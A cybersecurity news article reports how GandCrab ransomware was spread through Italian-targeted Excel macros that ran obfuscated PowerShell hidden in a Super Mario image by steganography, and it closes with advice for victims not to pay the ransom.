Malicious actors use Steganography and Mario graphic package to spread GandCrab and other malware
Cybersecurity experts have discovered that cybercriminals behind GandCrab are using the Steganography technique to distribute the virus. In addition, bad actors also combine highly obfuscated Microsoft PowerShell commands to launch the malicious payload by manipulating blue and green pixels of a well-known video game character Mario from Super Mario franchise.
For those who do not know, Steganography is a misleading method used by criminals to hide malicious data and codes in an original-looking file, avoid the detection of antivirus software, and then release the destructive payload once the destination has been reached.
Matthew Rowen, a computer security researcher from the Bromium company, has discovered that the payload includes a sample of a Trojan horse:
A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening.
Gandcrab ransomware is one of the most prominent file-locking threats that has been launching several distribution campaigns, collaborating with other malware, and using such sophisticated infection methods like exploit kits. This notorious cyber infection has many variants that aggressively target users all over the world. With its most recent campaign, GandCrab developers showed once again they keep looking for new infiltration techniques to maximize profits.
Cybersecurity experts discovered an Excel executable with embedded macros that download the payload, but only if the target comes from Italy
By taking a closer look at the malicious executable, researchers discovered that it includes an embedded macro which recognizes the target by keyboard layout and, if the PC is not using Italian country code (39), it exits the system without populating the malicious payload and encrypting files. Note that malicious spam emails also are written in Italian, pretending to be payment notices.
Moreover, cybercriminals have created the Excel sheet in a way to trick gullible users. The interesting thing is that if the person is keen on viewing the executable file properly, he/she needs to hit the “enable editing” button which then infects the machine with GandCrab. Bromium researchers have also discovered that the macro is launched by using Command Prompt and the Windows PowerShell:
After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments.
The Super Mario image is used for hiding Windows PowerShell commands
Talking about the mentioned Super Mario image, crooks have found a way to hide specific PowerShell commands in this picture. Some color parts, including blue and green, are manipulated to inject needed content. Practically, there is no way to tell the difference between a legitimate picture and the one that has been manipulated by Steganography, which increases the rate of infection.
After all its checks and preparations, the payload finally reaches an external server in order to download Gandcrab v5.1 (or other) ransomware. Once users are infected with this sneaky cyber threat, they find data modified by a sophisticated encryption algorithm which appends a random extension to each of the affected files.
Later on, victims are provided with a ransom message and urged to pay a particular price if they want to restore their files. However, if you ever appear to be infected with Gandcrab, do not pay the ransom, as the possibility of getting scammed and losing your money is quite high. Instead, utilize free decryptors available by security experts or make use of third-party software.